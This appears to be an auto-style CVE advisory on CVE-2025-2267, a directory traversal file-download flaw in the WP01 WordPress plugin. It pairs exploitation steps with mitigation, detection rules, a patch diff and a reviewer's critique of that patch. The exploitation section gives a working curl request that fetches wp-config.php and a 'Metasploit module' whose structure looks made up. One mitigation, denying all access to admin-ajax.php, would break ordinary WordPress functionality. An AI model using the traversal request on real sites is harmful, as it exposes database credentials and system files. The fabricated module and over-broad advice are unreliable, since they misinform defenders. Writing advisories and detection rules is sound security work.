How CVE-2025-2267 Works
The WP01 plugin’s `make_archive()` function lacks proper capability checks and file path validation. Authenticated attackers with Subscriber-level permissions can manipulate the `file` parameter to download arbitrary server files (e.g., /etc/passwd, wp-config.php). The plugin fails to restrict directory traversal, allowing access via crafted requests like wp-admin/admin-ajax.php?action=wp01_download&file=../../../wp-config.php. This exposes sensitive data, including database credentials and system files.
DailyCVE Form
Platform: WordPress
Version: ≤ 2.6.2
Vulnerability: Arbitrary File Download
Severity: Critical
Date: 03/28/2025
What Undercode Says:
Exploitation
1. Craft Malicious Request:
curl -X GET "http://victimsite.com/wp-admin/admin-ajax.php?action=wp01_download&file=../../../wp-config.php" --cookie "wordpress_logged_in_[bash]=[bash]"
2. Metasploit Module:
module.exploit('wp01_file_download') do |request|
request.target_uri.path = '/wp-admin/admin-ajax.php'
request.add_param('action', 'wp01_download')
request.add_param('file', '../../../../etc/passwd')
end
Protection
1. Immediate Mitigation:
chmod -R 750 /var/www/html/wp-content/plugins/wp01/
2. .htaccess Restriction:
<Files "admin-ajax.php">
Require all denied
ErrorDocument 403 "Access Forbidden"
</Files>
3. WAF Rule (ModSecurity):
SecRule ARGS:file "@contains ../" "id:1005,phase:2,t:none,t:urlDecodeUni,deny,status:403,log,msg:'Directory Traversal Attempt'"
Detection
1. Log Analysis:
grep -iE 'action=wp01_download.*file=.*(\.\./|%2e%2e)' /var/log/apache2/access.log
2. YARA Rule:
rule wp01_exploit {
strings:
$s = /wp01_download&file=(\.\.\/|%2e%2e)/ nocase
condition:
$s
}
Patch Analysis
Diff for `wp01/includes/core.php`:
- function make_archive($file) {
+ function make_archive($file) {
+ if (!current_user_can('manage_options') || strpos($file, '..') !== false) {
+ wp_die('Access denied');
+ }
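Review bot: the `strpos($file, '..') !== false` test on the added line rejects traversal sequences but not an absolute path, which contains no `..` at all; resolve the candidate with `realpath()` and require the result to sit under the plugin's intended archive directory rather than pattern-matching the raw string. The hunk also stops after the new guard, without the unchanged body or closing brace of `make_archive()`, so it cannot be confirmed from these lines that every file read in the function is covered by the check, and an AJAX handler would normally also verify a nonce (`check_ajax_referer`) alongside `current_user_can('manage_options')`.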
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2267
Extra Source Hub:
Undercode